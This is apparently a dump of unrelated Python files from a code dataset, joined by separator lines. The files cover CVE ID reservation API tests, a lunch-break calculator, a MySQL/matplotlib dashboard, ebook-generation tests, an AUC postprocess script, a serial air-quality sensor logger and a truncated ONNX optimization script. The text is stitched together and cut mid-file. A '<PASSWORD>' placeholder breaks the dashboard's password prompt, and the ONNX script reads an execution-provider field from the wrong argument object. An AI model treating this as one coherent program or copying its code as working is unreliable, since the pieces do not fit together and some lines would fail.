assert res.status_code == 200
def test_post_cve_id_no_params(org_admin_headers):
""" batch type is the only optional parameter for reserving ids """
res = requests.post(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers
)
assert res.status_code == 400
response_contains(res, 'amount')
response_contains(res, 'cve_year')
response_contains(res, 'short_name')
def test_post_cve_id_empty_params(org_admin_headers):
""" cve services doesn't accept id reservation with blank parameters """
res = requests.post(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'amount': '',
'batch_type': '',
'cve_year': '',
'short_name': ''
}
)
# NOTE: there isn't a `short_name` error here, why?
assert res.status_code == 400
response_contains(res, 'amount')
response_contains(res, 'cve_year')
def test_post_cve_id_wrong_header(org_admin_headers):
""" org_admin_headers cannot post for 'mitre' org """
res = requests.post(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'amount': '10',
'batch_type': 'sequential',
'cve_year': f'{utils.CURRENT_YEAR}',
'short_name': 'mitre'
}
)
# NOTE: this error also occurs when short_name is empty, expected error is 'NO_ORG_SHORTNAME'
# and when short_name is invalid, expected error is 'ORG_DNE'
assert res.status_code == 403
response_contains_json(res, 'error', 'ORG_CANNOT_RESERVE_FOR_OTHER')
def test_post_cve_id_empty_year(org_admin_headers):
""" cve services rejects empty year """
res = requests.post(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'amount': '10',
'batch_type': 'sequential',
'cve_year': '',
'short_name': 'mitre'
}
)
assert res.status_code == 400
response_contains_json(res, 'error', 'BAD_INPUT')
def test_post_cve_id_bad_year(org_admin_headers):
""" cve services rejects year that isn't a 4 digit number"""
res = requests.post(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'amount': '10',
'batch_type': 'sequential',
'cve_year': '20111',
'short_name': 'mitre'
}
)
assert res.status_code == 400
response_contains_json(res, 'error', 'BAD_INPUT')
def test_post_cve_id_empty_amount(org_admin_headers):
""" cve services rejects empty amount """
res = requests.post(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'amount': '',
'batch_type': 'sequential',
'cve_year': f'{utils.CURRENT_YEAR}',
'short_name': 'mitre'
}
)
assert res.status_code == 400
response_contains_json(res, 'error', 'BAD_INPUT')
def test_post_cve_id_invalid_amount(org_admin_headers):
""" cve services rejects amount less than or equal to 0 """
res = requests.post(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'amount': '-1',
'batch_type': 'sequential',
'cve_year': f'{utils.CURRENT_YEAR}',
'short_name': org_admin_headers['CVE-API-ORG']
}
)
assert res.status_code == 400
response_contains_json(res, 'error', 'INVALID_AMOUNT')
def test_post_cve_id_no_batch_type(org_admin_headers):
""" cve services rejects not having a batch type"""
res = requests.post(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'amount': '10',
'batch_type': '',
'cve_year': f'{utils.CURRENT_YEAR}',
'short_name': org_admin_headers['CVE-API-ORG']
}
)
assert res.status_code == 400
response_contains_json(res, 'error', 'NO_BATCH_TYPE')
def test_post_cve_id_invalid_batch_type(org_admin_headers):
""" cve services rejects batch types that aren't 'sequential' or 'nonsequential' """
res = requests.post(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'amount': '10',
'batch_type': '---',
'cve_year': f'{utils.CURRENT_YEAR}',
'short_name': org_admin_headers['CVE-API-ORG']
}
)
assert res.status_code == 400
response_contains_json(res, 'error', 'INVALID_BATCH_TYPE')
def test_post_cve_id_bad_amount(org_admin_headers):
""" api rejects non-numeric amount when requesting IDs """
res = get_reserve_cve_ids('a', utils.CURRENT_YEAR, org_admin_headers['CVE-API-ORG'])
assert res.status_code == 400
assert res.reason == 'Bad Request'
response_contains_json(res, 'error', 'BAD_INPUT')
assert_contains(res, 'amount')
def test_post_cve_id_reserve_priority(org_admin_headers):
""" priority ids can be reserved on behalf of the admin's org """
res = requests.post(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'amount': '1',
'cve_year': f'{utils.CURRENT_YEAR}',
'short_name': org_admin_headers['CVE-API-ORG']
}
)
ok_response_contains(res, f'CVE-{utils.CURRENT_YEAR}-')
assert json.loads(res.content.decode())['cve_ids']
assert len(json.loads(res.content.decode())['cve_ids']) == 1
priority_id = json.loads(res.content.decode())['cve_ids'][0]['cve_id']
assert int(priority_id.split('-')[-1]) < 20000
# Does this constitute a performance test? The distinction I'm making is that
# performance tests stress the system overall, while these tests try to
# test both "reservation works" and "there's some reasonable amount that we
# can request that doesn't stress the system"
@pytest.mark.parametrize(
"batch_type, amount",
[('sequential', 10), ('sequential', 1000),
('nonsequential', 1), ('nonsequential', 10)])
def test_post_cve_id_reservation(batch_type, amount, org_admin_headers):
""" sequential ids can be reserved on behalf of the mitre org """
res = get_reserve_cve_ids(amount, utils.CURRENT_YEAR, org_admin_headers['CVE-API-ORG'], batch_type)
ok_response_contains(res, f'CVE-{utils.CURRENT_YEAR}-')
assert json.loads(res.content.decode())['cve_ids']
assert len(json.loads(res.content.decode())['cve_ids']) == amount
# cna and user must exist
assert 'cna' in res.content.decode()
assert 'user' in res.content.decode()
def test_post_cve_id_reserve_sequential_over_quota(org_admin_headers):
""" the services api enforces a max quota of 100,000 """
res = get_reserve_cve_ids(100001, utils.CURRENT_YEAR, org_admin_headers['CVE-API-ORG'])
assert res.status_code == 403
response_contains_json(res, 'error', 'EXCEEDED_ID_QUOTA')
def test_post_cve_id_reserve_nonsequential_over_limit(org_admin_headers):
""" the services api enforces a max non-sequential limit of 10 """
res = get_reserve_cve_ids(11, utils.CURRENT_YEAR, org_admin_headers['CVE-API-ORG'], 'nonsequential')
assert res.status_code == 403
response_contains_json(res, 'error', 'OVER_NONSEQUENTIAL_MAX_AMOUNT')
#### GET /cve-id ####
def test_get_cve_id_by_time_reserved(org_admin_headers):
""" we can get ids immediately after reserving them using the time they're
reserved (noting that this may not work against a shared integration
environment, we check that at least this many have been reserved) """
n_ids = 10
time.sleep(1)
t_before = dt.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
time.sleep(1)
res_ids = get_reserve_cve_ids(n_ids, utils.CURRENT_YEAR, org_admin_headers['CVE-API-ORG'])
time.sleep(1)
t_after = dt.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
res_get_ids = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=utils.BASE_HEADERS,
params={
'time_reserved.lt': t_after,
'time_reserved.gt': t_before
}
)
ok_response_contains(res_get_ids, f'CVE-{utils.CURRENT_YEAR}-')
assert len(json.loads(res_get_ids.content.decode())['cve_ids']) == n_ids
def test_get_cve_id_by_time_modified(org_admin_headers):
""" we can get ids immediately after reserving them using the time they're
reserved (noting that this may not work against a shared integration
environment, we check that at least this many have been reserved) """
n_ids = 10
time.sleep(1)
t_before = dt.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
time.sleep(1)
res_ids = get_reserve_cve_ids(n_ids, utils.CURRENT_YEAR, org_admin_headers['CVE-API-ORG'])
time.sleep(1)
t_after = dt.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
res_get_ids = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=utils.BASE_HEADERS,
params={
'time_modified.lt': t_after,
'time_modified.gt': t_before
}
)
ok_response_contains(res_get_ids, f'CVE-{utils.CURRENT_YEAR}-')
assert len(json.loads(res_get_ids.content.decode())['cve_ids']) == n_ids
def test_get_cve_id_with_params(org_admin_headers):
""" org admin can retrieve ids"""
res = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'page': 1,
'state': 'PUBLIC',
'cve_id_year': 2011
}
)
assert res.status_code == 200
def test_get_cve_id_empty_parameters(org_admin_headers):
""" cannot get id with empty parameters """
res = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'page': ' ',
'state': ' ',
'cve_id_year': ' ',
'time_reserved.lt': ' ',
'time_reserved.gt': ' ',
'time_modified.lt': ' ',
'time_modified.gt': ' '
}
)
assert res.status_code == 400
response_contains(res, 'page')
response_contains(res, 'state')
response_contains(res, 'cve_id_year')
response_contains(res, 'time_reserved.lt')
response_contains(res, 'time_reserved.gt')
response_contains(res, 'time_modified.lt')
response_contains(res, 'time_modified.gt')
response_contains_json(res, 'error', 'BAD_INPUT')
def test_get_cve_id_page_format_number(org_admin_headers):
""" page must be an integer' """
res = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'page': 'test',
}
)
assert res.status_code == 400
response_contains_json(res, 'error', 'BAD_INPUT')
def test_get_cve_id_page_limit(org_admin_headers):
""" page must be greater than or equal to 1' """
res = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'page': '-1',
}
)
assert res.status_code == 400
response_contains_json(res, 'error', 'BAD_INPUT')
def test_get_cve_id_state_in_choices(org_admin_headers):
""" state parameter can only be 'REJECT', 'PUBLIC' or 'RESERVED' """
res = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'state': 'TEST',
}
)
assert res.status_code == 400
response_contains_json(res, 'error', 'BAD_INPUT')
def test_get_cve_id_year_format_with_letters(org_admin_headers):
""" cve_id_year format cannot have letters """
res = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'cve_id_year': 'test',
}
)
assert res.status_code == 400
response_contains_json(res, 'error', 'BAD_INPUT')
def test_get_cve_id_year_format_with_digits(org_admin_headers):
""" cve_id_year format must be 4 digits only """
res = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'cve_id_year': '20111',
}
)
assert res.status_code == 400
response_contains_json(res, 'error', 'BAD_INPUT')
def test_get_cve_id_available_state(org_admin_headers):
""" CVE ID filter endpoint does not return any IDs with state 'AVAILABLE' """
res = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'page': 1,
'state': 'PUBLIC',
'cve_id_year': 2011
}
)
assert res.status_code == 200
assert 'AVAILABLE' not in res.content.decode()
# CVE-ID ENDPOINT UTILITIES
# ==============================================================================
# these are unique to the `{CVE_ID_URL}` endpoint for the AWG system
def get_reserve_cve_ids(
amount, year, cna_short_name, batch_type='sequential'):
return requests.post(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=utils.BASE_HEADERS,
params={
'amount': f'{amount}',
'batch_type': batch_type,
'cve_year': f'{year}',
'short_name': cna_short_name
}
) | StarcoderdataPython |
315270 | from math import ceil
series_name: str = input()
episode_runtime: int = int(input())
lunch_break_duration: int = int(input())
timer: int = lunch_break_duration
timer -= episode_runtime
timer -= lunch_break_duration / 8
timer -= lunch_break_duration / 4
if timer >= 0:
print(f'You have enough time to watch {series_name} and left with {ceil(timer)} minutes free time.')
else:
print(f'You don\'t have enough time to watch {series_name}, you need {ceil(abs(timer))} more minutes.')
| StarcoderdataPython |
5114917 | # import modules
from .sql_kit import SQL_Kit
# libraries
import mysql.connector
from datetime import datetime
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import getpass
# this pulls data from the SQL database, then displays a dashboard of interactive plots, widgets and animations!
class Dashboard:
def __init__(self, userID=None, password=None, database='easytranspose'):
# if no credentials are passed, prompt user
if userID==None and password==None:
# MySQL info
self.userID = input('User ID: ')
self.password = <PASSWORD>('Password: ')
self.database = database
# credentials passed
else:
# MySQL info
self.userID = userID
self.password = password
self.database = database
""" SELECT * FROM table """
def select_table(self, table):
s = SQL_Kit(self.userID, self.password, self.database)
data = s.select_table(table)
return data
def display(self):
# import data from MySQL table
df = self.select_table('transpose')
data = df['StartPosition'].value_counts()
# set matplotlib style
plt.style.use('dark_background')
""" Daily Transpositions by Hour """
all_date_times = df['EventDateTime']
all_days = []
all_hours = []
for item in all_date_times:
all_days.append((item.timetuple().tm_yday))
all_hours.append(item.hour)
x = all_days
y = all_hours
x_labels = pd.Series(all_days).unique()
fig1, ax1 = plt.subplots()
ax1.set_title('Daily Transpositions by Hour')
ax1.scatter(x,y,color='mediumspringgreen',linewidths=1)
ax1.set_xlabel('day of year')
ax1.set_ylabel('hour')
ax1.xaxis.grid(True)
if len(x_labels) > 5:
ax1.xaxis.set_ticks([min(all_days), max(all_days)])
else:
ax1.xaxis.set_ticks(x_labels)
ax1.yaxis.grid(False)
plt.show()
""" MOVING AVERAGE """
def day_of_year(datetime_entry):
return datetime_entry.timetuple().tm_yday
df['day_of_year'] = list(df.apply(lambda x: day_of_year(x['EventDateTime']),axis=1))
daily_count = df['day_of_year'].value_counts().sort_index()
averages = []
i=1
for dab_count in daily_count:
values = daily_count[:i]
average = round(sum(values)/len(values),2)
averages.append(average)
i+=1
day_list = list(df['day_of_year'].unique())
avg_move_df = pd.DataFrame([day_list,averages]).T
avg_move_df.rename(columns={0: 'day_id', 1: 'moving_avg'},inplace=True)
avg_move_df.set_index('day_id',inplace=True)
fig1, ax1 = plt.subplots()
ax1.plot(avg_move_df.index.astype(int),avg_move_df['moving_avg'], color='mediumspringgreen')
ax1.set_title('Moving AVG')
ax1.set_xlabel('day_of_year')
ax1.xaxis.set_ticks([min(all_days), max(all_days)])
ax1.set_ylabel('avg transpositions per day')
plt.show()
""" Total Transpositions per day """
dates = []
for item in list(df['EventDateTime']):
day = item.day
month = item.month
year = item.year
date_st = str(month)+'/'+str(day)+'/'+str(year)
dates.append(date_st)
data = pd.DataFrame(pd.Series(dates).value_counts()).sort_index()
dates = list(data.index)
counts = list(data[0])
objects = dates
y_pos = np.arange(len(objects))
# get class info from class_absence_stats dataframe
performance = counts
#fig3 = plt.figure(3)
plt.bar(y_pos, performance, color='mediumspringgreen', align='center', alpha=0.8)
plt.xticks(y_pos, objects)
plt.title('Total Transpositions per Day')
plt.ylabel('Total Transpositions ')
plt.xlabel('Day')
plt.show()
""" Top 3 Instruments """
objects = df['Instrument'].value_counts().index[:3]
y_pos = np.arange(len(objects))
# get class info from class_absence_stats dataframe
performance = list(df['Instrument'].value_counts())[:3]
#fig3 = plt.figure(3)
plt.bar(y_pos, performance, color='mediumspringgreen', align='center', alpha=0.8)
plt.xticks(y_pos, objects)
plt.title('Top 3 Instruments')
plt.ylabel('Total Usage')
plt.xlabel('Instrument')
plt.show()
""" Top 5 Start Notes """
objects = df['StartNote'].value_counts().index[:5]
y_pos = np.arange(len(objects))
# get class info from class_absence_stats dataframe
performance = list(df['StartNote'].value_counts())[:5]
#fig3 = plt.figure(3)
plt.bar(y_pos, performance, color='mediumspringgreen',align='center', alpha=0.8)
plt.xticks(y_pos, objects)
plt.title('Top 5 Start Notes')
plt.ylabel('Total Usage')
plt.xlabel('Note Label')
plt.show()
""" Start Position Breakdown """
objects = self.select_table('transpose')['StartPosition'].value_counts().index[:5]
y_pos = np.arange(len(objects))
# get class info from class_absence_stats dataframe
performance = list(df['StartPosition'].value_counts())[:5]
#fig3 = plt.figure(3)
plt.bar(y_pos, performance, color='mediumspringgreen', align='center', alpha=0.8)
plt.xticks(y_pos, objects)
plt.title('Start Position')
plt.ylabel('Total Usage')
plt.xlabel('Start Position')
plt.show() | StarcoderdataPython |
4984338 | from txt2epub_pdf import txt2epub
from txt2epub_pdf import txt2pdf
class Testtxt2epub():
def test__make_1(self):
metadata = dict(
path="./tests/TEST BOOK",
title="テストブック",
title_ruby="てすとぶっく",
sub_title="txt2epub_pdfを使って",
author="Dr?Thomas",
author_ruby="どくたーとーます",
publisher="山原出版",
publisher_ruby="やまはらしゅっぱん",
illustrator="山原喜寛",
version=14,
original_first_day="1979-04-11",
original_url="https://www.hobofoto.work/",
fiction=True
)
epub_init = txt2epub(metadata)
assert epub_init.make() == '電子書籍(epub)の作成が完了しました。'
def test__make_2(self):
metadata = dict(
# path="TEST BOOK",
title="テストブック",
title_ruby="てすとぶっく",
sub_title="txt2epub_pdfを使って",
author="Dr?Thomas",
author_ruby="どくたーとーます",
publisher="山原出版",
publisher_ruby="やまはらしゅっぱん",
illustrator="山原喜寛",
version=14,
original_first_day="1979-04-11",
original_url="https://www.hobofoto.work/",
fiction=True
)
epub_init = txt2epub(metadata)
assert epub_init.make() == '読み込みディレクトリを設定して下さい。'
class Testtxt2pdf():
def test__make(self):
metadata = dict(
path="./tests/TEST BOOK",
title="テストブック",
title_ruby="てすとぶっく",
sub_title="txt2epub_pdfを使って",
author="Dr?Thomas",
author_ruby="どくたーとーます",
publisher="山原出版",
publisher_ruby="やまはらしゅっぱん",
illustrator="山原喜寛",
version=14,
original_first_day="1979-04-11",
original_url="https://www.hobofoto.work/",
fiction=True
)
pdf_init = txt2pdf(metadata)
assert pdf_init.make() == 'Portable Document Format(pdf)の作成が完了しました。'
| StarcoderdataPython |
29700 | <reponame>leelige/mindspore
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""postprocess."""
import argparse
import os
import numpy as np
from mindspore import Tensor
from src.config import ModelConfig
from src.metrics import AUCMetric
parser = argparse.ArgumentParser(description='CTR Prediction')
parser.add_argument('--result_path', type=str, default="./result_Files", help='Dataset path')
parser.add_argument('--label_path', type=str, default="./CriteoBinary/batch_labels", help='Checkpoint path')
args = parser.parse_args()
def get_acc():
''' get accuracy '''
config = ModelConfig()
batch_size = config.batch_size
auc_metric = AUCMetric()
files = os.listdir(args.label_path)
for f in files:
rst_file = os.path.join(args.result_path, f.split('.')[0] + '_0.bin')
label_file = os.path.join(args.label_path, f)
logit = Tensor(np.fromfile(rst_file, np.float32).reshape(batch_size, 1))
label = Tensor(np.fromfile(label_file, np.float32).reshape(batch_size, 1))
res = []
res.append(logit)
res.append(logit)
res.append(label)
auc_metric.update(*res)
auc = auc_metric.eval()
print("auc : {}".format(auc))
if __name__ == '__main__':
get_acc()
| StarcoderdataPython |
323423 | # Routine to parse the data line received from the sensors
# 20160705
# Changed the format of the data from the sensor.
# New dust sensor with more data and re-ordered the data channels
from random import randint
import serial # Serial communications
import os #OS calls to control the screensaver and play sounds
import time
class Pacman(object):
""" The real pacman. Open serial port on initialisation. Further calls read a new line of data """
def __init__(self):
# Read the settings from the settings file
settings_file = open("./config.txt")
# Define test or live mode
self.mode_line = settings_file.readline().rstrip('\n')
# e.g. "/dev/ttyAMA0,9600,N,8,n"
settings_line = settings_file.readline().rstrip('\n').split(',')
port = settings_line[0]
baud = eval(settings_line[1])
par = settings_line[2]
byte = eval(settings_line[3])
ceol = settings_line[4]
# Close the settings file
settings_file.close()
# Set the initial time for data storage
self.datapath = "../data/"
self.rec_time=time.gmtime()
if (self.mode_line == 'live'):
# If live ... open the serial port
# Open the serial port and clean the I/O buffer
self.ser = serial.Serial()
self.ser.port = settings_line[0]
self.ser.baudrate = baud
self.ser.parity = par
self.ser.bytesize = byte
self.ser.open()
self.ser.flushInput()
self.ser.flushOutput()
else:
# If test ... open and read sample file
file = open("pacman_sample.txt", "r")
self.lines = file.read().split('\n')
file.close()
# Initialise the activity counter
self.movlist = [0] * 60
# Initialise the frames for scaling Output
self.framePM1 = [0] * 60
self.framePM10 = [0] * 60
self.frameCO2 = [0] * 60
self.frameDUST = [0] * 60
self.frameTEMP = [10] * 60
# Initialise max/min for scaling Output
self.frameCO2 = [-2500] + self.frameCO2[:-1]
self.frameDUST = [300] + self.frameDUST[:-1]
self.frameTEMP = [30] + self.frameTEMP[:-1]
# Initialise the max/min for scales
self.maxCO2 = max(self.frameCO2)
self.minCO2 = min(self.frameCO2)
self.maxDUST = max(self.frameDUST)
self.minDUST = min(self.frameDUST)
self.maxTEMP = max(self.frameTEMP)
self.minTEMP = min(self.frameTEMP)
def read_data(self):
""" Reads data from pacman """
if (self.mode_line == 'live'):
# Get a line of data from PACMAN
line = self.ser.readline()
else:
end = len(self.lines) - 1
start = 0
idx = randint(start, end)
line = self.lines[idx]
self.entry = self.parse_line(line)
#print(self.entry)
return self.entry
def parse_line(self, line):
#Get the measurements
#Data line is:
#PM1
#PM2.5
#PM10
#TSIPM1
#TSIPM2.5
#TSIPM10
#Data7
#Data8
#Data9
#Distance
#Temperature
#RH
#CO2
err_value = -99
if len(line) >0:
if (line[0].isdigit()):
p_vec = list(map(float,line.split()))
if (len(p_vec)>=13):
pm1 = p_vec[0] #0
dust =p_vec[1] #1
pm10 = p_vec[2] #2
distance = p_vec[9] #3
t1 = p_vec[10] #4
rh = p_vec[11] #5
co2 = -1*p_vec[12] #6
else:
print("Short data line")
print(p_vec)
pm1 = err_value #0
dust = err_value #1
pm10 = err_value #2
distance = err_value #3
t1 = err_value #4
rh = err_value #5
co2 = err_value #6
else:
print("Non numeric first character")
print(line)
pm1 = err_value #0
dust = err_value #1
pm10 = err_value #2
distance = err_value #3
t1 = err_value #4
rh = err_value #5
co2 = err_value #6
else:
print("Line too short")
print(line)
pm1 = err_value #0
dust = err_value #1
pm10 = err_value #2
distance = err_value #3
t1 = err_value #4
rh = err_value #5
co2 = err_value #6
#PACMAN controlled activities
# Deactivate screensaver when something is close by (1.5m)
#if (distance<150):
#os.system("xscreensaver-command -deactivate &") #If something is close by... deactivate the screensaver
# Update the frame of data for scale
self.frameCO2 = [co2] + self.frameCO2[:-1]
self.frameDUST = [pm10] + self.frameDUST[:-1]
self.frameTEMP = [t1] + self.frameTEMP[:-1]
# Calculate the max/min for each stream only for valid data lines
if (pm10>0):
self.rec_time=time.gmtime()
self.timestamp = time.strftime("%Y/%m/%d %H:%M:%S GMT",self.rec_time)
self.maxCO2 = max(self.frameCO2)
self.minCO2 = min(self.frameCO2)
self.maxDUST = max(self.frameDUST)
self.minDUST = min(self.frameDUST)
self.maxTEMP = max(self.frameTEMP)
self.minTEMP = min(self.frameTEMP)
file_line = self.timestamp+','+str(pm1)+','+str(dust)+','+str(pm10)+','+str(distance)+','+str(t1)+','+str(rh)+','+str(co2)
# We have data so we save it
current_file_name = self.datapath+time.strftime("%Y%m%d.txt",self.rec_time)
current_file = open(current_file_name,"a")
current_file.write(file_line+"\n")
current_file.flush()
current_file.close()
# C D E F G A B
#print(co2)
# 0 1 2 3 4 5 6 7 8 9 10 11 12
print(pm1, dust, pm10, distance, t1, rh, co2, self.minCO2, self.maxCO2, self.minDUST, self.maxDUST, self.minTEMP, self.maxTEMP)
return (pm1, dust, pm10, distance, t1, rh, co2, self.minCO2, self.maxCO2, self.minDUST, self.maxDUST, self.minTEMP, self.maxTEMP)
| StarcoderdataPython |
8099545 | #!/usr/bin/env python
# coding=utf-8
# Copyright The HuggingFace Team and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for multiple choice.
"""
# You can also adapt this script on your own multiple choice task. Pointers for this are left as comments.
import json
import logging
import os
import sys
from dataclasses import dataclass, field
from functools import partial
from itertools import chain
from typing import Optional, Union
import datasets
import numpy as np
import torch
import transformers
from datasets import load_dataset
from transformers import HfArgumentParser, TrainingArguments
from transformers.tokenization_utils_base import PreTrainedTokenizerBase
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import check_min_version
from optimum.onnxruntime import ORTModel, ORTOptimizer
from optimum.onnxruntime.configuration import OptimizationConfig, ORTConfig
# Will error if the minimal version of Transformers is not installed. The version of transformers must be >= 4.19.0
# as the export to onnx of multiple choice topologies was added in this release. Remove at your own risks.
check_min_version("4.19.0")
logger = logging.getLogger(__name__)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
},
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
max_seq_length: Optional[int] = field(
default=1024,
metadata={
"help": "The maximum total input sequence length after tokenization. If passed, sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
},
)
def __post_init__(self):
if self.train_file is not None:
extension = self.train_file.split(".")[-1]
assert extension in ["csv", "json"], "`train_file` should be a csv or a json file."
if self.validation_file is not None:
extension = self.validation_file.split(".")[-1]
assert extension in ["csv", "json"], "`validation_file` should be a csv or a json file."
@dataclass
class OptimizationArguments:
"""
Arguments pertaining to what type of optimization we are going to apply on the model.
"""
opset: Optional[int] = field(
default=None,
metadata={"help": "ONNX opset version to export the model with."},
)
optimization_level: Optional[int] = field(
default=1,
metadata={
"help": "Optimization level performed by ONNX Runtime of the loaded graph."
"0 will disable all optimizations."
"1 will enable basic optimizations."
"2 will enable basic and extended optimizations, including complex node fusions applied to the nodes "
"assigned to the CPU or CUDA execution provider, making the resulting optimized graph hardware dependent."
"99 will enable all available optimizations including layout optimizations."
},
)
optimize_with_onnxruntime_only: bool = field(
default=False,
metadata={
"help": "Whether to only use ONNX Runtime to optimize the model and no graph fusion in Python."
"Graph fusion might require offline, Python scripts, to be run."
},
)
optimize_for_gpu: bool = field(
default=False,
metadata={
"help": "Whether to optimize the model for GPU inference. The optimized graph might contain operators for "
"GPU or CPU only when optimization_level > 1."
},
)
execution_provider: str = field(
default="CPUExecutionProvider",
metadata={"help": "ONNX Runtime execution provider to use for inference."},
)
def main():
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments, OptimizationArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args, optim_args = parser.parse_json_file(
json_file=os.path.abspath(sys.argv[1])
)
else:
model_args, data_args, training_args, optim_args = parser.parse_args_into_dataclasses()
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
if (
optim_args.optimization_level > 1
and optim_args.optimize_for_gpu
and model_args.execution_provider == "CPUExecutionProvider"
):
raise ValueError(
f"Optimization level is set at {optim_args.optimization_level} and "
f"GPU optimization will be done, although the CPU execution provider "
f"was selected. Use --execution_provider CUDAExecutionProvider."
)
if (
optim_args.optimization_level > 1
and not optim_args.optimize_for_gpu
and model_args.execution_provider == "CUDAExecutionProvider"
):
raise ValueError(
f"Optimization level is set at {optim_args.optimization_level} and "
f"CPU optimization will be done, although the GPU execution provider "
f"was selected. Remove the argument --execution_provider CUDAExecutionProvider."
)
logger.info(f"Optimization with the following parameters {optim_args}")
if os.path.isdir(training_args.output_dir) and not training_args.overwrite_output_dir:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
os.makedirs(training_args.output_dir, exist_ok=True)
model_path = os.path.join(training_args.output_dir, "model.onnx")
optimized_model_path = os.path.join(training_args.output_dir, "model-optimized.onnx")
# Create the optimization configuration containing all the optimization parameters
optimization_config = OptimizationConfig(
optimization_level=optim_args.optimization_level,
optimize_with_onnxruntime_only=optim_args.optimize_with_onnxruntime_only,
optimize_for_gpu=optim_args.optimize_for_gpu,
)
# Create the optimizer
optimizer = ORTOptimizer.from_pretrained(
model_args.model_name_or_path, feature="multiple-choice", opset=optim_args.opset
)
# Export the optimized model
optimizer.export(
onnx_model_path=model_path,
onnx_optimized_model_output_path=optimized_model_path,
optimization_config=optimization_config,
)
# Create the ONNX Runtime configuration summarizing all the parameters related to ONNX IR export and optimization
ort_config = ORTConfig(opset=optimizer.opset, optimization=optimization_config)
# Save the configuration
